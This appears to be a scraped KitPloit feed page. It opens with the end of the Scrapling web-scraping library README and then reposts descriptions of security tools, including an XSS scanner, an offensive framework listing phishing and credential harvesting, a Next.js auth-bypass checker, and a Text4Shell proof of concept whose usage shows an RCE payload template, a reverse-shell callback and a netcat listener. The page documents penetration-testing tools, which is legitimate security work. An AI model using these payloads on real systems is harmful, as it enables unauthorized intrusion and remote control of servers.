[<data='<a href="catalogue/a-light-in-the-attic_...' parent='<h3><a href="catalogue/a-light-in-the-at...'>,
<data='<a href="catalogue/soumission_998/index....' parent='<h3><a href="catalogue/soumission_998/in...'>,
<data='<a href="catalogue/sharp-objects_997/ind...' parent='<h3><a href="catalogue/sharp-objects_997...'>,
...]

# You will notice that the number of elements is 19 not 20 because the current element is not included.
>>> len(page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title']))
19

# Get the `href` attribute from all similar elements
>>> [element.attrib['href'] for element in page.find_by_text('Tipping the Velvet').find_similar(ignore_attributes=['title'])]
['catalogue/a-light-in-the-attic_1000/index.html',
'catalogue/soumission_998/index.html',
'catalogue/sharp-objects_997/index.html',
...]

To increase the complexity a little bit, let's say we want to get all books' data using that element as a starting point for some reason

>>> for product in page.find_by_text('Tipping the Velvet').parent.parent.find_similar():
print({
"name": product.css_first('h3 a::text'),
"price": product.css_first('.price_color').re_first(r'[\d\.]+'),
"stock": product.css('.availability::text')[-1].clean()
})
{'name': 'A Light in the ...', 'price': '51.77', 'stock': 'In stock'}
{'name': 'Soumission', 'price': '50.10', 'stock': 'In stock'}
{'name': 'Sharp Objects', 'price': '47.82', 'stock': 'In stock'}
...

The documentation will provide more advanced examples.

Handling Structural Changes

Let's say you are scraping a page with a structure like this:

<div class="container">
<section class="products">
<article class="product" id="p1">
<h3>Product 1</h3>
<p class="description">Description 1</p>
</article>
<article class="product" id="p2">
<h3>Product 2</h3>
<p class="description">Description 2</p>
</article>
</section>
</div>

And you want to scrape the first product, the one with the p1 ID. You will probably write a selector like this

page.css('#p1')

When website owners implement structural changes like

<div class="new-container">
<div class="product-wrapper">
<section class="products">
<article class="product new-class" data-id="p1">
<div class="product-info">
<h3>Product 1</h3>
<p class="new-description">Description 1</p>
</div>
</article>
<article class="product new-class" data-id="p2">
<div class="product-info">
<h3>Product 2</h3>
<p class="new-description">Description 2</p>
</div>
</article>
</section>
</div>
</div>

The selector will no longer function and your code needs maintenance. That's where Scrapling's auto-matching feature comes into play.

from scrapling.parser import Adaptor
# Before the change
page = Adaptor(page_source, url='example.com')
element = page.css('#p1' auto_save=True)
if not element: # One day website changes?
element = page.css('#p1', auto_match=True) # Scrapling still finds it!
# the rest of the code...

How does the auto-matching work? Check the FAQs section for that and other possible issues while auto-matching.

Real-World Scenario

Let's use a real website as an example and use one of the fetchers to fetch its source. To do this we need to find a website that will change its design/structure soon, take a copy of its source then wait for the website to make the change. Of course, that's nearly impossible to know unless I know the website's owner but that will make it a staged test haha.

To solve this issue, I will use The Web Archive's Wayback Machine. Here is a copy of StackOverFlow's website in 2010, pretty old huh?Let's test if the automatch feature can extract the same button in the old design from 2010 and the current design using the same selector :)

If I want to extract the Questions button from the old design I can use a selector like this #hmenus > div:nth-child(1) > ul > li:nth-child(1) > a This selector is too specific because it was generated by Google Chrome. Now let's test the same selector in both versions

>> from scrapling.fetchers import Fetcher
>> selector = '#hmenus > div:nth-child(1) > ul > li:nth-child(1) > a'
>> old_url = "https://web.archive.org/web/20100102003420/http://stackoverflow.com/"
>> new_url = "https://stackoverflow.com/"
>>
>> page = Fetcher(automatch_domain='stackoverflow.com').get(old_url, timeout=30)
>> element1 = page.css_first(selector, auto_save=True)
>>
>> # Same selector but used in the updated website
>> page = Fetcher(automatch_domain="stackoverflow.com").get(new_url)
>> element2 = page.css_first(selector, auto_match=True)
>>
>> if element1.text == element2.text:
... print('Scrapling found the same element in the old design and the new design!')
'Scrapling found the same element in the old design and the new design!'

Note that I used a new argument called automatch_domain, this is because for Scrapling these are two different URLs, not the website so it isolates their data. To tell Scrapling they are the same website, we then pass the domain we want to use for saving auto-match data for them both so Scrapling doesn't isolate them.

In a real-world scenario, the code will be the same except it will use the same URL for both requests so you won't need to use the automatch_domain argument. This is the closest example I can give to real-world cases so I hope it didn't confuse you :)

Notes: 1. For the two examples above I used one time the Adaptor class and the second time the Fetcher class just to show you that you can create the Adaptor object by yourself if you have the source or fetch the source using any Fetcher class then it will create the Adaptor object for you. 2. Passing the auto_save argument with the auto_match argument set to False while initializing the Adaptor/Fetcher object will only result in ignoring the auto_save argument value and the following warning message text Argument `auto_save` will be ignored because `auto_match` wasn't enabled on initialization. Check docs for more info. This behavior is purely for performance reasons so the database gets created/connected only when you are planning to use the auto-matching features. Same case with the auto_match argument.

  1. The auto_match parameter works only for Adaptor instances not Adaptors so if you do something like this you will get an error python page.css('body').css('#p1', auto_match=True) because you can't auto-match a whole list, you have to be specific and do something like python page.css_first('body').css('#p1', auto_match=True)

Find elements by filters

Inspired by BeautifulSoup's find_all function you can find elements by using find_all/find methods. Both methods can take multiple types of filters and return all elements in the pages that all these filters apply to.

  • To be more specific:
  • Any string passed is considered a tag name
  • Any iterable passed like List/Tuple/Set is considered an iterable of tag names.
  • Any dictionary is considered a mapping of HTML element(s) attribute names and attribute values.
  • Any regex patterns passed are used as filters to elements by their text content
  • Any functions passed are used as filters
  • Any keyword argument passed is considered as an HTML element attribute with its value.

So the way it works is after collecting all passed arguments and keywords, each filter passes its results to the following filter in a waterfall-like filtering system.
It filters all elements in the current page/element in the following order:

  1. All elements with the passed tag name(s).
  2. All elements that match all passed attribute(s).
  3. All elements that its text content match all passed regex patterns.
  4. All elements that fulfill all passed function(s).

Note: The filtering process always starts from the first filter it finds in the filtering order above so if no tag name(s) are passed but attributes are passed, the process starts from that layer and so on. But the order in which you pass the arguments doesn't matter.

Examples to clear any confusion :)

>> from scrapling.fetchers import Fetcher
>> page = Fetcher().get('https://quotes.toscrape.com/')
# Find all elements with tag name `div`.
>> page.find_all('div')
[<data='<div class="container"> <div class="row...' parent='<body> <div class="container"> <div clas...'>,
<data='<div class="row header-box"> <div class=...' parent='<div class="container"> <div class="row...'>,
...]

# Find all div elements with a class that equals `quote`.
>> page.find_all('div', class_='quote')
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Same as above.
>> page.find_all('div', {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all elements with a class that equals `quote`.
>> page.find_all({'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Find all div elements with a class that equals `quote`, and contains the element `.text` which contains the word 'world' in its content.
>> page.find_all('div', {'class': 'quote'}, lambda e: "world" in e.css_first('.text::text'))
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>]

# Find all elements that don't have children.
>> page.find_all(lambda element: len(element.children) > 0)
[<data='<html lang="en"><head><meta charset="UTF...'>,
<data='<head><meta charset="UTF-8"><title>Quote...' parent='<html lang="en"><head><meta charset="UTF...'>,
<data='<body> <div class="container"> <div clas...' parent='<html lang="en"><head><meta charset="UTF...'>,
...]

# Find all elements that contain the word 'world' in its content.
>> page.find_all(lambda element: "world" in element.text)
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<a class="tag" href="/tag/world/page/1/"...' parent='<div class="tags"> Tags: <meta class="ke...'>]

# Find all span elements that match the given regex
>> page.find_all('span', re.compile(r'world'))
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>]

# Find all div and span elements with class 'quote' (No span elements like that so only div returned)
>> page.find_all(['div', 'span'], {'class': 'quote'})
[<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
<data='<div class="quote" itemscope itemtype="h...' parent='<div class="col-md-8"> <div class="quote...'>,
...]

# Mix things up
>> page.find_all({'itemtype':"http://schema.org/CreativeWork"}, 'div').css('.author::text')
['Albert Einstein',
'J.K. Rowling',
...]

Is That All?

Here's what else you can do with Scrapling:

  • Accessing the lxml.etree object itself of any element directly python >>> quote._root <Element div at 0x107f98870>
  • Saving and retrieving elements manually to auto-match them outside the css and the xpath methods but you have to set the identifier by yourself.

  • To save an element to the database: python >>> element = page.find_by_text('Tipping the Velvet', first_match=True) >>> page.save(element, 'my_special_element')

  • Now later when you want to retrieve it and relocate it inside the page with auto-matching, it would be like this python >>> element_dict = page.retrieve('my_special_element') >>> page.relocate(element_dict, adaptor_type=True) [<data='<a href="catalogue/tipping-the-velvet_99...' parent='<h3><a href="catalogue/tipping-the-velve...'>] >>> page.relocate(element_dict, adaptor_type=True).css('::text') ['Tipping the Velvet']
  • if you want to keep it as lxml.etree object, leave the adaptor_type argument python >>> page.relocate(element_dict) [<Element a at 0x105a2a7b0>]

  • Filtering results based on a function

# Find all products over $50
expensive_products = page.css('.product_pod').filter(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) > 50
)
  • Searching results for the first one that matches a function
# Find all the products with price '53.23'
page.css('.product_pod').search(
lambda p: float(p.css('.price_color').re_first(r'[\d\.]+')) == 54.23
)
  • Doing operations on element content is the same as scrapy python quote.re(r'regex_pattern') # Get all strings (TextHandlers) that match the regex pattern quote.re_first(r'regex_pattern') # Get the first string (TextHandler) only quote.json() # If the content text is jsonable, then convert it to json using `orjson` which is 10x faster than the standard json library and provides more options except that you can do more with them like python quote.re( r'regex_pattern', replace_entities=True, # Character entity references are replaced by their corresponding character clean_match=True, # This will ignore all whitespaces and consecutive spaces while matching case_sensitive= False, # Set the regex to ignore letters case while compiling it ) Hence all of these methods are methods from the TextHandler within that contains the text content so the same can be done directly if you call the .text property or equivalent selector function.

  • Doing operations on the text content itself includes

  • Cleaning the text from any white spaces and replacing consecutive spaces with single space python quote.clean()
  • You already know about the regex matching and the fast json parsing but did you know that all strings returned from the regex search are actually TextHandler objects too? so in cases where you have for example a JS object assigned to a JS variable inside JS code and want to extract it with regex and then convert it to json object, in other libraries, these would be more than 1 line of code but here you can do it in 1 line like this python page.xpath('//script/text()').re_first(r'var dataLayer = (.+);').json()
  • Sort all characters in the string as if it were a list and return the new string python quote.sort(reverse=False)

    To be clear, TextHandler is a sub-class of Python's str so all normal operations/methods that work with Python strings will work with it.

  • Any element's attributes are not exactly a dictionary but a sub-class of mapping called AttributesHandler that's read-only so it's faster and string values returned are actually TextHandler objects so all operations above can be done on them, standard dictionary operations that don't modify the data, and more :)

  • Unlike standard dictionaries, here you can search by values too and can do partial searches. It might be handy in some cases (returns a generator of matches) python >>> for item in element.attrib.search_values('catalogue', partial=True): print(item) {'href': 'catalogue/tipping-the-velvet_999/index.html'}
  • Serialize the current attributes to JSON bytes: python >>> element.attrib.json_string b'{"href":"catalogue/tipping-the-velvet_999/index.html","title":"Tipping the Velvet"}'
  • Converting it to a normal dictionary python >>> dict(element.attrib) {'href': 'catalogue/tipping-the-velvet_999/index.html', 'title': 'Tipping the Velvet'}

Scrapling is under active development so expect many more features coming soon :)

More Advanced Usage

There are a lot of deep details skipped here to make this as short as possible so to take a deep dive, head to the docs section. I will try to keep it updated as possible and add complex examples. There I will explain points like how to write your storage system, write spiders that don't depend on selectors at all, and more...

Note that implementing your storage system can be complex as there are some strict rules such as inheriting from the same abstract class, following the singleton design pattern used in other classes, and more. So make sure to read the docs first.

[!IMPORTANT] A website is needed to provide detailed library documentation.
I'm trying to rush creating the website, researching new ideas, and adding more features/tests/benchmarks but time is tight with too many spinning plates between work, personal life, and working on Scrapling. I have been working on Scrapling for months for free after all.

If you like Scrapling and want it to keep improving then this is a friendly reminder that you can help by supporting me through the sponsor button.

⚑ Enlightening Questions and FAQs

This section addresses common questions about Scrapling, please read this section before opening an issue.

How does auto-matching work?

  1. You need to get a working selector and run it at least once with methods css or xpath with the auto_save parameter set to True before structural changes happen.
  2. Before returning results for you, Scrapling uses its configured database and saves unique properties about that element.
  3. Now because everything about the element can be changed or removed, nothing from the element can be used as a unique identifier for the database. To solve this issue, I made the storage system rely on two things:

    1. The domain of the URL you gave while initializing the first Adaptor object
    2. The identifier parameter you passed to the method while selecting. If you didn't pass one, then the selector string itself will be used as an identifier but remember you will have to use it as an identifier value later when the structure changes and you want to pass the new selector.

    Together both are used to retrieve the element's unique properties from the database later. 4. Now later when you enable the auto_match parameter for both the Adaptor instance and the method call. The element properties are retrieved and Scrapling loops over all elements in the page and compares each one's unique properties to the unique properties we already have for this element and a score is calculated for each one. 5. Comparing elements is not exact but more about finding how similar these values are, so everything is taken into consideration, even the values' order, like the order in which the element class names were written before and the order in which the same element class names are written now. 6. The score for each element is stored in the table, and the element(s) with the highest combined similarity scores are returned.

How does the auto-matching work if I didn't pass a URL while initializing the Adaptor object?

Not a big problem as it depends on your usage. The word default will be used in place of the URL field while saving the element's unique properties. So this will only be an issue if you used the same identifier later for a different website that you didn't pass the URL parameter while initializing it as well. The save process will overwrite the previous data and auto-matching uses the latest saved properties only.

If all things about an element can change or get removed, what are the unique properties to be saved?

For each element, Scrapling will extract: - Element tag name, text, attributes (names and values), siblings (tag names only), and path (tag names only). - Element's parent tag name, attributes (names and values), and text.

I have enabled the auto_save/auto_match parameter while selecting and it got completely ignored with a warning message

That's because passing the auto_save/auto_match argument without setting auto_match to True while initializing the Adaptor object will only result in ignoring the auto_save/auto_match argument value. This behavior is purely for performance reasons so the database gets created only when you are planning to use the auto-matching features.

I have done everything as the docs but the auto-matching didn't return anything, what's wrong?

It could be one of these reasons: 1. No data were saved/stored for this element before. 2. The selector passed is not the one used while storing element data. The solution is simple - Pass the old selector again as an identifier to the method called. - Retrieve the element with the retrieve method using the old selector as identifier then save it again with the save method and the new selector as identifier. - Start using the identifier argument more often if you are planning to use every new selector from now on. 3. The website had some extreme structural changes like a new full design. If this happens a lot with this website, the solution would be to make your code as selector-free as possible using Scrapling features.

Can Scrapling replace code built on top of BeautifulSoup4?

Pretty much yeah, almost all features you get from BeautifulSoup can be found or achieved in Scrapling one way or another. In fact, if you see there's a feature in bs4 that is missing in Scrapling, please make a feature request from the issues tab to let me know.

Can Scrapling replace code built on top of AutoScraper?

Of course, you can find elements by text/regex, find similar elements in a more reliable way than AutoScraper, and finally save/retrieve elements manually to use later as the model feature in AutoScraper. I have pulled all top articles about AutoScraper from Google and tested Scrapling against examples in them. In all examples, Scrapling got the same results as AutoScraper in much less time.

Is Scrapling thread-safe?

Yes, Scrapling instances are thread-safe. Each Adaptor instance maintains its state.

More Sponsors!

Contributing

Everybody is invited and welcome to contribute to Scrapling. There is a lot to do!

Please read the contributing file before doing anything.

Disclaimer for Scrapling Project

[!CAUTION] This library is provided for educational and research purposes only. By using this library, you agree to comply with local and international laws regarding data scraping and privacy. The authors and contributors are not responsible for any misuse of this software. This library should not be used to violate the rights of others, for unethical purposes, or to use data in an unauthorized or illegal manner. Do not use it on any website unless you have permission from the website owner or within their allowed rules like the robots.txt file, for example.

License

This work is licensed under BSD-3

Acknowledgments

This project includes code adapted from: - Parsel (BSD License) - Used for translator submodule

Thanks and References

Known Issues

  • In the auto-matching save process, the unique properties of the first element from the selection results are the only ones that get saved. So if the selector you are using selects different elements on the page that are in different locations, auto-matching will probably return to you the first element only when you relocate it later. This doesn't include combined CSS selectors (Using commas to combine more than one selector for example) as these selectors get separated and each selector gets executed alone.

Designed & crafted with ❀️ by Karim Shoair.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

VulnKnox - A Go-based Wrapper For The KNOXSS API To Automate XSS Vulnerability Testing

By: Unknown β€” April 27th 2025 at 12:30


VulnKnox is a powerful command-line tool written in Go that interfaces with the KNOXSS API. It automates the process of testing URLs for Cross-Site Scripting (XSS) vulnerabilities using the advanced capabilities of the KNOXSS engine.


Features

  • Supports pipe input for passing file lists and echoing URLs for testing
  • Configurable retries and timeouts
  • Supports GET, POST, and BOTH HTTP methods
  • Advanced Filter Bypass (AFB) feature
  • Flash Mode for quick XSS polyglot testing
  • CheckPoC feature to verify the proof of concept
  • Concurrent processing with configurable parallelism
  • Custom headers support for authenticated requests
  • Proxy support
  • Discord webhook integration for notifications
  • Detailed output with color-coded results

Installation

go install github.com/iqzer0/vulnknox@latest

Configuration

Before using the tool, you need to set up your configuration:

API Key

Obtain your KNOXSS API key from knoxss.me.

On the first run, a default configuration file will be created at:

Linux/macOS: ~/.config/vulnknox/config.json
Windows: %APPDATA%\VulnKnox\config.json
Edit the config.json file and replace YOUR_API_KEY_HERE with your actual API key.

Discord Webhook (Optional)

If you want to receive notifications on Discord, add your webhook URL to the config.json file or use the -dw flag.

Usage

Usage of vulnknox:

-u Input URL to send to KNOXSS API
-i Input file containing URLs to send to KNOXSS API
-X GET HTTP method to use: GET, POST, or BOTH
-pd POST data in format 'param1=value&param2=value'
-headers Custom headers in format 'Header1:value1,Header2:value2'
-afb Use Advanced Filter Bypass
-checkpoc Enable CheckPoC feature
-flash Enable Flash Mode
-o The file to save the results to
-ow Overwrite output file if it exists
-oa Output all results to file, not just successful ones
-s Only show successful XSS payloads in output
-p 3 Number of parallel processes (1-5)
-t 600 Timeout for API requests in seconds
-dw Discord Webhook URL (overrides config file)
-r 3 Number of retries for failed requests
-ri 30 Interval between retries in seconds
-sb 0 Skip domains after this many 403 responses
-proxy Proxy URL (e.g., http://127.0.0.1:8080)
-v Verbose output
-version Show version number
-no-banner Suppress the banner
-api-key KNOXSS API Key (overrides config file)

Basic Examples

Test a single URL using GET method:

vulnknox -u "https://example.com/page?param=value"

Test a URL with POST data:

vulnknox -u "https://example.com/submit" -X POST -pd "param1=value1&param2=value2"

Enable Advanced Filter Bypass and Flash Mode:

vulnknox -u "https://example.com/page?param=value" -afb -flash

Use custom headers (e.g., for authentication):

vulnknox -u "https://example.com/secure" -headers "Cookie:sessionid=abc123"

Process URLs from a file with 5 concurrent processes:

vulnknox -i urls.txt -p 5

Send notifications to Discord on successful XSS findings:

vulnknox -u "https://example.com/page?param=value" -dw "https://discord.com/api/webhooks/your/webhook/url"

Advanced Usage

Test both GET and POST methods with CheckPoC enabled:

vulnknox -u "https://example.com/page" -X BOTH -checkpoc

Use a proxy and increase the number of retries:

vulnknox -u "https://example.com/page?param=value" -proxy "http://127.0.0.1:8080" -r 5

Suppress the banner and only show successful XSS payloads:

vulnknox -u "https://example.com/page?param=value" -no-banner -s

Output Explanation

[ XSS! ]: Indicates a successful XSS payload was found.
[ SAFE ]: No XSS vulnerability was found in the target.
[ ERR! ]: An error occurred during the request.
[ SKIP ]: The domain or URL was skipped due to multiple failed attempts (e.g., after receiving too many 403 Forbidden responses as specified by the -sb option).
[BALANCE]: Indicates your current API usage with KNOXSS, showing how many API calls you've used out of your total allowance.

The tool also provides a summary at the end of execution, including the number of requests made, successful XSS findings, safe responses, errors, and any skipped domains.

Contributing

Contributions are welcome! If you have suggestions for improvements or encounter any issues, please open an issue or submit a pull request.

License

This project is licensed under the MIT License.

Credits

@KN0X55
@BruteLogic
@xnl_h4ck3r



☐ β˜† βœ‡ KitPloit - PenTest Tools!

PEGASUS-NEO - A Comprehensive Penetration Testing Framework Designed For Security Professionals And Ethical Hackers. It Combines Multiple Security Tools And Custom Modules For Reconnaissance, Exploitation, Wireless Attacks, Web Hacking, And More

By: Unknown β€” April 24th 2025 at 12:30


                              ____                                  _   _ 
| _ \ ___ __ _ __ _ ___ _ _ ___| \ | |
| |_) / _ \/ _` |/ _` / __| | | / __| \| |
| __/ __/ (_| | (_| \__ \ |_| \__ \ |\ |
|_| \___|\__, |\__,_|___/\__,_|___/_| \_|
|___/
β–ˆβ–ˆβ–ˆβ–„ β–ˆ β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–’β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ
β–ˆβ–ˆ β–€β–ˆ β–ˆ β–“β–ˆ β–€ β–’β–ˆβ–ˆβ–’ β–ˆβ–ˆβ–’
β–“β–ˆβ–ˆ β–€β–ˆ β–ˆβ–ˆβ–’β–’β–ˆβ–ˆβ–ˆ β–’β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–’
β–“β–ˆβ–ˆβ–’ β–β–Œβ–ˆβ–ˆβ–’β–’β–“β–ˆ β–„ β–’β–ˆβ–ˆ β–ˆβ–ˆβ–‘
β–’β–ˆβ–ˆβ–‘ β–“β–ˆβ–ˆβ–‘β–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–’β–‘ β–ˆβ–ˆβ–ˆβ–ˆβ–“β–’β–‘
β–‘ β–’β–‘ β–’ β–’ β–‘β–‘ β–’β–‘ β–‘β–‘ β–’β–‘β–’β–‘β–’β–‘
β–‘ β–‘β–‘ β–‘ β–’β–‘ β–‘ β–‘ β–‘ β–‘ β–’ β–’β–‘
β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–’
β–‘ β–‘ β–‘ β–‘ β–‘

PEGASUS-NEO Penetration Testing Framework

Β 

πŸ›‘οΈ Description

PEGASUS-NEO is a comprehensive penetration testing framework designed for security professionals and ethical hackers. It combines multiple security tools and custom modules for reconnaissance, exploitation, wireless attacks, web hacking, and more.

⚠️ Legal Disclaimer

This tool is provided for educational and ethical testing purposes only. Usage of PEGASUS-NEO for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state, and federal laws.

Developers assume no liability and are not responsible for any misuse or damage caused by this program.

πŸ”’ Copyright Notice

PEGASUS-NEO - Advanced Penetration Testing Framework
Copyright (C) 2024 Letda Kes dr. Sobri. All rights reserved.

This software is proprietary and confidential. Unauthorized copying, transfer, or
reproduction of this software, via any medium is strictly prohibited.

Written by Letda Kes dr. Sobri <muhammadsobrimaulana31@gmail.com>, January 2024

🌟 Features

Password: Sobri

  • Reconnaissance & OSINT
  • Network scanning
  • Email harvesting
  • Domain enumeration
  • Social media tracking

  • Exploitation & Pentesting

  • Automated exploitation
  • Password attacks
  • SQL injection
  • Custom payload generation

  • Wireless Attacks

  • WiFi cracking
  • Evil twin attacks
  • WPS exploitation

  • Web Attacks

  • Directory scanning
  • XSS detection
  • SQL injection
  • CMS scanning

  • Social Engineering

  • Phishing templates
  • Email spoofing
  • Credential harvesting

  • Tracking & Analysis

  • IP geolocation
  • Phone number tracking
  • Email analysis
  • Social media hunting

πŸ”§ Installation

# Clone the repository
git clone https://github.com/sobri3195/pegasus-neo.git

# Change directory
cd pegasus-neo

# Install dependencies
sudo python3 -m pip install -r requirements.txt

# Run the tool
sudo python3 pegasus_neo.py

πŸ“‹ Requirements

  • Python 3.8+
  • Linux Operating System (Kali/Ubuntu recommended)
  • Root privileges
  • Internet connection

πŸš€ Usage

  1. Start the tool:
sudo python3 pegasus_neo.py
  1. Enter authentication password
  2. Select category from main menu
  3. Choose specific tool or module
  4. Follow on-screen instructions

πŸ” Security Features

  • Source code protection
  • Integrity checking
  • Anti-tampering mechanisms
  • Encrypted storage
  • Authentication system

πŸ› οΈ Supported Tools

Reconnaissance & OSINT

  • Nmap
  • Wireshark
  • Maltego
  • Shodan
  • theHarvester
  • Recon-ng
  • SpiderFoot
  • FOCA
  • Metagoofil

Exploitation & Pentesting

  • Metasploit
  • SQLmap
  • Commix
  • BeEF
  • SET
  • Hydra
  • John the Ripper
  • Hashcat

Wireless Hacking

  • Aircrack-ng
  • Kismet
  • WiFite
  • Fern Wifi Cracker
  • Reaver
  • Wifiphisher
  • Cowpatty
  • Fluxion

Web Hacking

  • Burp Suite
  • OWASP ZAP
  • Nikto
  • XSStrike
  • Wapiti
  • Sublist3r
  • DirBuster
  • WPScan

πŸ“ Version History

  • v1.0.0 (2024-01) - Initial release
  • v1.1.0 (2024-02) - Added tracking modules
  • v1.2.0 (2024-03) - Added tool installer

πŸ‘₯ Contributing

This is a proprietary project and contributions are not accepted at this time.

🀝 Support

For support, please email muhammadsobrimaulana31@gmail.com atau https://lynk.id/muhsobrimaulana

βš–οΈ License

This project is protected under proprietary license. See the LICENSE file for details.

Made with ❀️ by Letda Kes dr. Sobri



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Text4Shell-Exploit - A Custom Python-based Proof-Of-Concept (PoC) Exploit Targeting Text4Shell (CVE-2022-42889), A Critical Remote Code Execution Vulnerability In Apache Commons Text Versions < 1.10

By: Unknown β€” April 23rd 2025 at 12:30


A custom Python-based proof-of-concept (PoC) exploit targeting Text4Shell (CVE-2022-42889), a critical remote code execution vulnerability in Apache Commons Text versions < 1.10. This exploit targets vulnerable Java applications that use the StringSubstitutor class with interpolation enabled, allowing injection of ${script:...} expressions to execute arbitrary system commands.

In this PoC, exploitation is demonstrated via the data query parameter; however, the vulnerable parameter name may vary depending on the implementation. Users should adapt the payload and request path accordingly based on the target application's logic.

Disclaimer: This exploit is provided for educational and authorized penetration testing purposes only. Use responsibly and at your own risk.


Description

This is a custom Python3 exploit for the Apache Commons Text vulnerability known as Text4Shell (CVE-2022-42889). It allows Remote Code Execution (RCE) via insecure interpolators when user input is dynamically evaluated by StringSubstitutor.

Tested against: - Apache Commons Text < 1.10.0 - Java applications using ${script:...} interpolation from untrusted input

Usage

python3 text4shell.py <target_ip> <callback_ip> <callback_port>

Example

python3 text4shell.py 127.0.0.1 192.168.1.2 4444

Make sure to set up a lsitener on your attacking machine:

nc -nlvp 4444

Payload Logic

The script injects:

${script:javascript:java.lang.Runtime.getRuntime().exec(...)}

The reverse shell is sent via /data parameter using a POST request.



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Ghost-Route - Ghost Route Detects If A Next JS Site Is Vulnerable To The Corrupt Middleware Bypass Bug (CVE-2025-29927)

By: Unknown β€” April 22nd 2025 at 12:30


A Python script to check Next.js sites for corrupt middleware vulnerability (CVE-2025-29927).

The corrupt middleware vulnerability allows an attacker to bypass authentication and access protected routes by send a custom header x-middleware-subrequest.

Next JS versions affected: - 11.1.4 and up

[!WARNING] This tool is for educational purposes only. Do not use it on websites or systems you do not own or have explicit permission to test. Unauthorized testing may be illegal and unethical.

Β 

Installation

Clone the repo

git clone https://github.com/takumade/ghost-route.git
cd ghost-route

Create and activate virtual environment

python -m venv .venv
source .venv/bin/activate

Install dependencies

pip install -r requirements.txt

Usage

python ghost-route.py <url> <path> <show_headers>
  • <url>: Base URL of the Next.js site (e.g., https://example.com)
  • <path>: Protected path to test (default: /admin)
  • <show_headers>: Show response headers (default: False)

Example

Basic Example

python ghost-route.py https://example.com /admin

Show Response Headers

python ghost-route.py https://example.com /admin True

License

MIT License

Credits



☐ β˜† βœ‡ KitPloit - PenTest Tools!

TruffleHog Explorer - A User-Friendly Web-Based Tool To Visualize And Analyze Data Extracted Using TruffleHog

By: Unknown β€” April 18th 2025 at 12:30


Welcome toΒ TruffleHog Explorer, a user-friendly web-based tool to visualize and analyze data extracted using TruffleHog. TruffleHog is one of the most powerful secrets discovery, classification, validation, and analysis open source tool. In this context, a secret refers to a credential a machine uses to authenticate itself to another machine. This includes API keys, database passwords, private encryption keys, and more.

With an improved UI/UX, powerful filtering options, and export capabilities, this tool helps security professionals efficiently review potential secrets and credentials found in their repositories.

⚠️ This dashboard has been tested only with GitHub TruffleHog JSON outputs. Expect updates soon to support additional formats and platforms.

You can use online version here: TruffleHog Explorer


πŸš€ Features

  • Intuitive UI/UX: Beautiful pastel theme with smooth navigation.
  • Powerful Filtering:
  • Filter findings by repository, detector type, and uploaded file.
  • Flexible date range selection with a calendar picker.
  • Verification status categorization for effective review.
  • Advanced search capabilities for faster identification.
  • Batch Operations:
  • Verify or reject multiple findings with a single click.
  • Toggle visibility of rejected results for a streamlined view.
  • Bulk processing to manage large datasets efficiently.
  • Export Capabilities:
  • Export verified secrets or filtered findings effortlessly.
  • Save and load session backups for continuity.
  • Generate reports in multiple formats (JSON, CSV).
  • Dynamic Sorting:
  • Sort results by repository, date, or verification status.
  • Customizable sorting preferences for a personalized experience.

πŸ“₯ Installation & Usage

1. Clone the Repository

$ git clone https://github.com/yourusername/trufflehog-explorer.git
$ cd trufflehog-explorer

2. Open the index.html

Simply open the index.html file in your preferred web browser.

$ open index.html

πŸ“‚ How to Use

  1. Upload TruffleHog JSON Findings:
  2. Click on the "Load Data" section and select your .json files from TruffleHog output.
  3. Multiple files are supported.
  4. Apply Filters:
  5. Choose filters such as repository, detector type, and verification status.
  6. Utilize the date range picker to narrow down findings.
  7. Leverage the search function to locate specific findings quickly.
  8. Review Findings:
  9. Click on a finding to expand and view its details.
  10. Use the action buttons to verify or reject findings.
  11. Add comments and annotations for better tracking.
  12. Export Results:
  13. Export verified or filtered findings for reporting.
  14. Save session data for future review and analysis.
  15. Save Your Progress:
  16. Save your session and resume later without losing any progress.
  17. Automatic backup feature to prevent data loss.

Happy Securing! πŸ”’



☐ β˜† βœ‡ KitPloit - PenTest Tools!

Wappalyzer-Next - Python library that uses Wappalyzer extension (and its fingerprints) to detect technologies

By: Unknown β€” April 16th 2025 at 12:30


This project is a command line tool and python library that uses Wappalyzer extension (and its fingerprints) to detect technologies. Other projects emerged after discontinuation of the official open source project are using outdated fingerpints and lack accuracy when used on dynamic web-apps, this project bypasses those limitations.


Installation

Before installing wappalyzer, you will to install Firefox and geckodriver/releases">geckodriver. Below are detailed steps for setting up geckodriver but you may use google/youtube for help.

Setting up geckodriver

Step 1: Download GeckoDriver

  1. Visit the official GeckoDriver releases page on GitHub:
    https://github.com/mozilla/geckodriver/releases
  2. Download the version compatible with your system:
  3. For Windows: geckodriver-vX.XX.X-win64.zip
  4. For macOS: geckodriver-vX.XX.X-macos.tar.gz
  5. For Linux: geckodriver-vX.XX.X-linux64.tar.gz
  6. Extract the downloaded file to a folder of your choice.

Step 2: Add GeckoDriver to the System Path

